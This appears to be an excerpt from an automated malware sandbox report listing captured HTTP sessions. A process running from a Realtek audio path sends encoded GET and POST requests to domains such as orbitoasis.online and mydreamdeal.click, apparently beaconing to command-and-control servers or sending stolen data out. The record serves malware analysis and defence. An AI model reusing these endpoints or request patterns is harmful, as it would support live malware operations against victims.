                                                                                  Data Ascii: IUY=1XpfOM1gsz3GOPRAIOJbAdm1sXTYyu7fsolyjQDQB/ybUvvpXfoFtv1QaQVxiF1yg7jjSHfRm3KQEsmxLdpte47aEDBjITDZ8qyP8KOL4eA/+THr12+7BQQydewG26CIoo0wuhfizoUyuIQveyIHcK2YFVk4m2eSD71fwmx3857c0dZKNUMYBU4LxgCfNbyTldGsW8YnaM6eOTr8gEGrW/satXTvaxL7zQyWlywXw74yWqD2SCNuLnKz/pdvQREI4l6BZhGK5zYhWlBWgkCDg0HRKxhI+QI94YmYk0UKZJWgGnH5QrWfHpvTKtVp0ji8t1TdftagZlnbf86sl+UBg9JGlHAUw/5eqWe6A04r+zT1NogCCIYx0TICSsm10HQYckwPrChyK+qOT98OBOgFpMasdy1eK6zE7dt0WqlLs6jyFwOU4SEySYTfvVlxRANI2rOMRuVHeGabbZEDVyxRfkC9EzuxlXGrmK/GafGFT92tcpUcsfm+SKNcX+7AXN16ZW9+iJQkAfOsr0ZAgBAbad6R4YdvZEbUsNARvVpcCeocgy277+faQGwrrTo5KzKrF44Gk4orVasb44BJZu08Avy6PSbbhor1vXue67/HPzLIJoqsG1BPN96Sv8wYUOX+nsz2zbpdhTRxo4a+6/xB24Q2YGavi1NsWz/ZYWenYb/DKDe5O1n1bFnnYoFEk5a/6VzieJODvd83jcRQhWWFK6S6vjanCXtu11bNd4iA0gy+6MuDS55qOmymtdegfcuLvfHq9c/gqRlrTNm7htdSoJzEqcE0vcezr+hPXdHbaBIXORgAjxGqXLXQSeWv0gGQFbumyfXg4n2f+EooMNOJINQtXabYnzZfod42B24V3PTscS1zPjsvzRD1lTHUxkBwMeKQJ7A1h3hdMcmROVG18L9BE5znthUc3SWey6IMnkzSJk2xlTkDY/HLO4TwvDWclt4FxdLblsYNjzbHjCNw3JWsnVAxIReGJf6gxGZVhQtm8hcO [TRUNCATED]
                                                                                  Dec 4, 2024 17:13:18.342441082 CET5360OUTData Raw: 46 6f 65 35 45 6f 53 75 30 63 6c 75 2f 2f 47 76 78 6f 46 2b 39 38 52 66 5a 4e 69 6c 5a 43 6b 2f 43 44 6e 71 74 38 64 46 43 56 56 59 53 32 79 6f 45 56 76 4a 52 65 35 76 30 51 65 6b 30 75 6f 6e 78 6d 74 62 44 45 6a 44 74 37 59 44 6b 75 54 44 63 67
                                                                                  Data Ascii: Foe5EoSu0clu//GvxoF+98RfZNilZCk/CDnqt8dFCVVYS2yoEVvJRe5v0Qek0uonxmtbDEjDt7YDkuTDcgRy6l7C/FwpqCNmmTeoYLv5D1ajoadSG3eDYg5kUHxeJoZkM7/zu/Joqe2jca9usMGKdU3pe8I1AGLiqt2ADT4Rv/wFqN90lTxFTUabem0ACf/uuR0H4WTIQZC2iSV1vxl9YN+cdlDHz8bPi4sw+smBaYuxy5Wf0Ev
                                                                                  Dec 4, 2024 17:13:18.797456980 CET1063INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 04 Dec 2024 16:13:18 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                                                  Expires: Wed, 04 Dec 2024 16:13:18 GMT
                                                                                  Vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=buSuNyr%2FJoWvd4M23myA5gUQiU7rdnUfstUx2FA2%2FER9ySxYEfk9CDj37zhOADjbNgiCYUk7xX74m6Nw67MQ72Gf7r2n97gSLbSawEqW1EW6yOpBuxalLAcDXku9mclgY4cVHVtXzIs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ecd153e0b245c69-MIA
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=124414&min_rtt=124414&rtt_var=62207&sent=6&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7938&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 37 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c ce 41 0a 80 30 10 03 c0 7b 5f e1 0b 5c 2b 3d 86 3d 7a f4 0f 6a 8b 2b 68 0b 65 05 fd bd a0 05 c5 6b 32 84 40 74 5b d9 40 c2 e0 19 ba e8 1a d8 35 ae ea 93 56 5d da a3 07 3d 21 e8 26 06 63 f2 27 1b 4c 21 6a c8 0c b1 7f 2f 96 41 a5 36 90 fc e2 38 2f f1 20 5b b7 ae 6e 3e 84 ca 24 dd 5f 2e 00 00 00 ff ff e3 02 00 68 e7 b5 eb 93 00 00 00 0d 0a
                                                                                  Data Ascii: 7a\A0{_\+==zj+hek2@t[@5V]=!&c'L!j/A68/ [n>$_.h
                                                                                  Dec 4, 2024 17:13:18.797501087 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  32192.168.11.2049750104.21.27.59807484C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:13:20.992326975 CET493OUTGET /1ag2/?IUY=4VB/N4F6tibqC9FQILl1J+73qE/jxtiF4YtEqiz3GsaSMOHPZtZI38VqeQNXmBxLoc2gIm7YkXHcJ/CISLsxf+n8D3thRkzZ5amN14yu7swz/i/g4nn3MSQ=&h7i-=tZtx HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.mydreamdeal.click
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Dec 4, 2024 17:13:21.473937035 CET1059INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 04 Dec 2024 16:13:21 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Cache-Control: no-cache, no-store, must-revalidate
                                                                                  Expires: Wed, 04 Dec 2024 16:13:21 GMT
                                                                                  Vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u4f8Peun4ZrfyjlY8CHSWJYwDUidzdfDjrnY33JebA47FHvVHFBYQ7d1oi8Nd3BImj3GomOzWPdIQL8RfXjgK0q1QG2VoGqpK1Aw8l1Xn4JNSIOyR7rhdPVZATk6oImUpoq8iEgozl0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ecd154e9d1ea515-MIA
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=123905&min_rtt=123905&rtt_var=61952&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=493&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 39 33 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                  Data Ascii: 93<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0</center></body></html>
                                                                                  Dec 4, 2024 17:13:21.473982096 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  33192.168.11.2049775172.67.187.11480
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:14:54.526568890 CET489OUTGET /vluw/?h7i-=tZtx&IUY=Qny9vPKZpQxlYqiENFuqCTovdcuESvtoVbvPUumHvVgYiZzoUIcT00pHd/ClJ1QqOMs3sbdEqCPN2Gnhne5G7wrUY6Sf9n2bmecGwgkPVQzmhsXBPGmPUbE= HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.zkdamdjj.shop
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Dec 4, 2024 17:14:55.640592098 CET1270INHTTP/1.1 301 Moved Permanently
                                                                                  Date: Wed, 04 Dec 2024 16:14:55 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                  x-redirect-by: WordPress
                                                                                  location: https://zkdamdjj.shop/vluw/?h7i-=tZtx&IUY=Qny9vPKZpQxlYqiENFuqCTovdcuESvtoVbvPUumHvVgYiZzoUIcT00pHd/ClJ1QqOMs3sbdEqCPN2Gnhne5G7wrUY6Sf9n2bmecGwgkPVQzmhsXBPGmPUbE=
                                                                                  x-litespeed-cache-control: public,max-age=3600
                                                                                  x-litespeed-tag: 02a_HTTP.404,02a_HTTP.301,02a_404,02a_URL.a6d5303f744e03a41043b4a748aa35ee,02a_
                                                                                  x-litespeed-cache: miss
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YgVqz77r%2FJPTSFf7igZUSFb5eCQqWP8Qvv%2FtHbswz9JwHdrgMDHUOQpw2DWKY0wegywasjbJ4TRVV1LpCOpVzkOPziQJaPiBgoIMWLyRBJaOgit2txWVaBUZVDan23OaOcXHng%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ecd17972a6474ac-MIA
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=124270&min_rtt=124270&rtt_var=62135&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=489&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  34192.168.11.204977666.29.132.19480
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:15:09.032955885 CET769OUTPOST /k6yn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.orbitoasis.online
                                                                                  Origin: http://www.orbitoasis.online
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 200
                                                                                  Connection: close
                                                                                  Referer: http://www.orbitoasis.online/k6yn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Data Raw: 49 55 59 3d 67 50 42 36 32 5a 47 32 79 50 65 30 50 6d 62 50 61 63 6c 65 76 75 48 76 45 39 4e 61 4c 32 51 6c 49 53 38 74 31 48 76 4b 75 31 68 76 34 78 67 47 6f 42 64 61 4a 35 67 59 4f 34 58 56 46 69 41 47 57 73 76 6d 36 51 67 68 59 73 4d 4a 31 65 74 30 50 4b 4a 69 30 41 61 49 35 35 6f 66 69 50 34 50 66 4b 75 57 69 37 56 4e 67 47 46 59 31 39 6a 73 6e 4f 41 67 7a 47 72 33 38 6b 59 54 6f 42 6b 5a 69 72 5a 6a 30 4a 6d 46 32 6c 46 34 34 59 62 74 6c 32 52 46 6b 67 4d 32 44 48 48 6c 66 4a 42 58 38 78 36 4e 39 51 55 59 6d 74 6d 4d 44 33 61 4a 6d 6f 36 45 6f 34 32 47 45 65 78 4f 4e 47 4d 4e 79 41 3d 3d
                                                                                  Data Ascii: IUY=gPB62ZG2yPe0PmbPaclevuHvE9NaL2QlIS8t1HvKu1hv4xgGoBdaJ5gYO4XVFiAGWsvm6QghYsMJ1et0PKJi0AaI55ofiP4PfKuWi7VNgGFY19jsnOAgzGr38kYToBkZirZj0JmF2lF44Ybtl2RFkgM2DHHlfJBX8x6N9QUYmtmMD3aJmo6Eo42GEexONGMNyA==
                                                                                  Dec 4, 2024 17:15:09.239115000 CET1289INHTTP/1.1 404 Not Found
                                                                                  keep-alive: timeout=5, max=100
                                                                                  content-type: text/html
                                                                                  transfer-encoding: chunked
                                                                                  content-encoding: gzip
                                                                                  vary: Accept-Encoding
                                                                                  date: Wed, 04 Dec 2024 16:15:09 GMT
                                                                                  server: LiteSpeed
                                                                                  x-turbo-charged-by: LiteSpeed
                                                                                  connection: close
                                                                                  Data Raw: 31 33 35 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED]
                                                                                  Data Ascii: 1359ZJvLg!qCV's=pB<w?Kfm( o=|3q+{XV)w]vtOv,"fv?B0GVp]nyyG=56jZ:UMh/0K'wRUX7!rVY:s*^o/^VL?{fUm7n*/L-B/?.+0@{?{T`+1J`,(?{~61y??1?LuwK,D*yl]XqfG}g}z@Kf]e7{._",-0A_\WXqo_Pl!.\c=$?3gE/-"!=z`@]Wh-5@yFgj]IyPN>!Io<?=n*Ko:;j}vV Eoqhd[\=^f&32Q#b2zcQ>2/ol?yqXV>uY]!!_u&-)o>2bi3}`dmyG;].Q>P|}m_QmV8HrT~I*@W KYxSz125?VPtYCzug|Jf7~Nh@b?ls^yyV^2 [TRUNCATED]
                                                                                  Dec 4, 2024 17:15:09.239175081 CET1289INData Raw: f8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d e5 a7 0b b2 9f fd fa fd bc 37 f6 fb 15 b7 ac 7d 98 45 fa 89 df bd e2 c7 28 7f 43 f1 12 49 3f 38 14 f5 54 5e b4 34 b9 3d 17 dc 90 f8 75 2f bf 22 fa de d3 fb 81 be 5d a3 f6 47 8f fb f5 7d 1f bc b0 00 e1
                                                                                  Data Ascii: O0Bq7]7}E(CI?8T^4=u/"]G}~=q<^z?4GLRb ,d^s"g^a0oeZero>z9nr~g2_F]r|8OXf
                                                                                  Dec 4, 2024 17:15:09.239240885 CET1289INData Raw: d4 36 19 5b 4a a0 8e ed b3 39 e4 18 5e e5 73 7f b4 4e 0f e7 64 4b 5b fa b8 e2 ba 28 d8 b4 f8 e8 74 c6 05 26 41 8e 5c c3 ed 27 cc b8 61 8d bd bb a5 d4 20 9d 47 aa ce c3 e1 58 66 53 66 01 07 ad d5 cc 8a 51 12 2a 73 61 6d 2e b9 21 d1 e5 34 5f c4 a4
                                                                                  Data Ascii: 6[J9^sNdK[(t&A\'a GXfSfQ*sam.!4_&;pBM=:rRy%9\[(n.ZAX-i$,^Lkr#JWcv?f|e)MbHZp9M)e1>qZB0t-Zm>Tj3V=3+L`
                                                                                  Dec 4, 2024 17:15:09.239285946 CET1289INData Raw: f6 d6 8b b8 c4 61 28 37 f0 6b b7 5e 27 72 05 95 41 a4 b9 73 07 6f 46 e3 54 99 d8 32 3b 13 9a 8c 85 a0 ce 69 f2 0c 1c ef 98 7c b8 f2 32 be 13 ca 03 72 9a 02 1e 04 bd 2e c7 65 b2 09 48 51 d8 f0 62 3b ab 16 a7 71 2d 8f 14 17 6e a9 b4 a0 bb 65 4a 99
                                                                                  Data Ascii: a(7k^'rAsoFT2;i|2r.eHQb;q-neJ'qF*fAC2hxAkuZW4,F6Q;:fWSRWd@vHNgfD1zO[h6x<&8PDaz$d[DWu$P[;.n)Nkt56!]i,NK
                                                                                  Dec 4, 2024 17:15:09.239319086 CET74INData Raw: f5 cf 80 f9 5e 67 2f 45 c5 bb 6f cc f7 fa e2 7f ff 17 a8 00 a1 a3 c1 35 b5 0f 4c f6 6c 36 f3 c6 20 ef f1 f5 08 5f 5b ed 11 7e ce 5f 8f 97 67 72 df 7e fb 1f 00 00 00 ff ff 03 00 51 bb 70 46 84 27 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: ^g/Eo5Ll6 _[~_gr~QpF'0


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  35192.168.11.204977766.29.132.19480
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:15:11.767509937 CET789OUTPOST /k6yn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.orbitoasis.online
                                                                                  Origin: http://www.orbitoasis.online
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 220
                                                                                  Connection: close
                                                                                  Referer: http://www.orbitoasis.online/k6yn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Data Raw: 49 55 59 3d 67 50 42 36 32 5a 47 32 79 50 65 30 4f 46 54 50 4a 74 6c 65 74 4f 48 73 59 74 4e 61 65 47 52 4e 49 54 41 74 31 47 37 67 76 44 78 76 35 51 51 47 76 41 64 61 4f 35 67 59 46 59 58 4d 4c 43 41 37 57 73 79 5a 36 54 34 68 59 74 6f 4a 31 66 64 30 4f 37 4a 39 31 51 61 4b 73 70 6f 64 39 66 34 50 66 4b 75 57 69 37 42 7a 67 43 52 59 31 4f 72 73 6e 73 34 6a 2b 6d 72 77 32 45 59 54 69 52 6b 64 69 72 5a 52 30 4c 53 2f 32 6e 39 34 34 64 6e 74 69 6e 52 47 76 67 4d 73 41 33 47 32 50 62 4d 67 77 67 6d 6c 2b 44 38 49 6a 63 7a 77 4c 42 58 54 37 61 4f 67 72 72 71 30 41 75 49 6d 50 45 4e 57 76 4f 34 2f 76 65 32 37 6b 37 43 72 6f 34 51 37 41 69 2f 31 58 77 34 3d
                                                                                  Data Ascii: IUY=gPB62ZG2yPe0OFTPJtletOHsYtNaeGRNITAt1G7gvDxv5QQGvAdaO5gYFYXMLCA7WsyZ6T4hYtoJ1fd0O7J91QaKspod9f4PfKuWi7BzgCRY1Orsns4j+mrw2EYTiRkdirZR0LS/2n944dntinRGvgMsA3G2PbMgwgml+D8IjczwLBXT7aOgrrq0AuImPENWvO4/ve27k7Cro4Q7Ai/1Xw4=
                                                                                  Dec 4, 2024 17:15:12.005808115 CET1289INHTTP/1.1 404 Not Found
                                                                                  keep-alive: timeout=5, max=100
                                                                                  content-type: text/html
                                                                                  transfer-encoding: chunked
                                                                                  content-encoding: gzip
                                                                                  vary: Accept-Encoding
                                                                                  date: Wed, 04 Dec 2024 16:15:11 GMT
                                                                                  server: LiteSpeed
                                                                                  x-turbo-charged-by: LiteSpeed
                                                                                  connection: close
                                                                                  Data Raw: 31 33 35 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f [TRUNCATED]
                                                                                  Data Ascii: 1359ZJvLg!qCV's=pB<w?Kfm( o=|3q+{XV)w]vtOv,"fv?B0GVp]nyyG=56jZ:UMh/0K'wRUX7!rVY:s*^o/^VL?{fUm7n*/L-B/?.+0@{?{T`+1J`,(?{~61y??1?LuwK,D*yl]XqfG}g}z@Kf]e7{._",-0A_\WXqo_Pl!.\c=$?3gE/-"!=z`@]Wh-5@yFgj]IyPN>!Io<?=n*Ko:;j}vV Eoqhd[\=^f&32Q#b2zcQ>2/ol?yqXV>uY]!!_u&-)o>2bi3}`dmyG;].Q>P|}m_QmV8HrT~I*@W KYxSz125?VPtYCzug|Jf7~Nh@b?ls^yyV^2 [TRUNCATED]
                                                                                  Dec 4, 2024 17:15:12.005821943 CET1289INData Raw: f8 4f fb 30 08 42 c7 71 d3 37 96 fa d1 be 5d e5 a7 0b b2 9f fd fa fd bc 37 f6 fb 15 b7 ac 7d 98 45 fa 89 df bd e2 c7 28 7f 43 f1 12 49 3f 38 14 f5 54 5e b4 34 b9 3d 17 dc 90 f8 75 2f bf 22 fa de d3 fb 81 be 5d a3 f6 47 8f fb f5 7d 1f bc b0 00 e1
                                                                                  Data Ascii: O0Bq7]7}E(CI?8T^4=u/"]G}~=q<^z?4GLRb ,d^s"g^a0oeZero>z9nr~g2_F]r|8OXf
                                                                                  Dec 4, 2024 17:15:12.005841017 CET1289INData Raw: d4 36 19 5b 4a a0 8e ed b3 39 e4 18 5e e5 73 7f b4 4e 0f e7 64 4b 5b fa b8 e2 ba 28 d8 b4 f8 e8 74 c6 05 26 41 8e 5c c3 ed 27 cc b8 61 8d bd bb a5 d4 20 9d 47 aa ce c3 e1 58 66 53 66 01 07 ad d5 cc 8a 51 12 2a 73 61 6d 2e b9 21 d1 e5 34 5f c4 a4
                                                                                  Data Ascii: 6[J9^sNdK[(t&A\'a GXfSfQ*sam.!4_&;pBM=:rRy%9\[(n.ZAX-i$,^Lkr#JWcv?f|e)MbHZp9M)e1>qZB0t-Zm>Tj3V=3+L`
                                                                                  Dec 4, 2024 17:15:12.005852938 CET1289INData Raw: f6 d6 8b b8 c4 61 28 37 f0 6b b7 5e 27 72 05 95 41 a4 b9 73 07 6f 46 e3 54 99 d8 32 3b 13 9a 8c 85 a0 ce 69 f2 0c 1c ef 98 7c b8 f2 32 be 13 ca 03 72 9a 02 1e 04 bd 2e c7 65 b2 09 48 51 d8 f0 62 3b ab 16 a7 71 2d 8f 14 17 6e a9 b4 a0 bb 65 4a 99
                                                                                  Data Ascii: a(7k^'rAsoFT2;i|2r.eHQb;q-neJ'qF*fAC2hxAkuZW4,F6Q;:fWSRWd@vHNgfD1zO[h6x<&8PDaz$d[DWu$P[;.n)Nkt56!]i,NK
                                                                                  Dec 4, 2024 17:15:12.006041050 CET74INData Raw: fa 67 c0 7c af b3 97 a2 e2 dd 37 e6 7b 7d f1 bf ff 0b 54 80 d0 d1 e0 9a da 07 26 7b 36 9b 79 63 90 f7 f8 7a 84 af ad f6 08 3f e7 af c7 cb 33 b9 6f bf fd 0f 00 00 00 ff ff 03 00 93 6a 8f f5 84 27 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: g|7{}T&{6ycz?3oj'0


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  36192.168.11.204977866.29.132.19480
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 4, 2024 17:15:14.488239050 CET2578OUTPOST /k6yn/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.orbitoasis.online
                                                                                  Origin: http://www.orbitoasis.online
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 7368
                                                                                  Connection: close
                                                                                  Referer: http://www.orbitoasis.online/k6yn/
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                                  Data Raw: 49 55 59 3d 67 50 42 36 32 5a 47 32 79 50 65 30 4f 46 54 50 4a 74 6c 65 74 4f 48 73 59 74 4e 61 65 47 52 4e 49 54 41 74 31 47 37 67 76 44 35 76 35 6d 6b 47 76 6a 46 61 50 35 67 59 47 59 58 52 4c 43 41 71 57 73 37 51 36 55 77 62 59 76 67 4a 31 38 56 30 48 76 6c 39 37 51 61 4b 7a 5a 6f 51 69 50 34 67 66 4f 79 61 69 37 52 7a 67 43 52 59 31 50 37 73 68 2b 41 6a 74 32 72 33 38 6b 59 58 6f 42 6b 6c 69 71 77 6d 30 4c 57 76 32 57 64 34 34 39 58 74 6a 52 4e 47 7a 77 4d 71 4a 6e 48 78 50 62 41 2f 77 67 36 70 2b 43 49 6d 6a 64 72 77 4a 67 71 50 73 72 4f 58 2b 35 79 74 63 4e 6b 46 42 45 67 41 67 4f 52 41 73 49 79 67 6b 50 66 6e 68 36 59 59 52 52 2f 44 47 33 51 68 6e 49 68 6f 7a 4f 39 52 59 6a 53 78 71 56 32 56 2b 5a 35 7a 63 38 4b 42 61 32 34 6c 5a 6d 5a 35 6a 6b 35 66 44 2f 49 37 4c 48 39 4b 48 33 2f 6d 72 37 2b 68 55 56 37 5a 2b 63 30 71 33 32 2b 64 57 37 6a 6d 49 56 69 79 52 59 36 4e 37 52 58 62 52 45 73 4d 34 72 6c 6d 47 65 4c 41 74 57 67 58 33 6a 37 33 63 79 4d 76 43 48 50 64 4b 5a 37 42 79 56 43 35 44 5a [TRUNCATED]
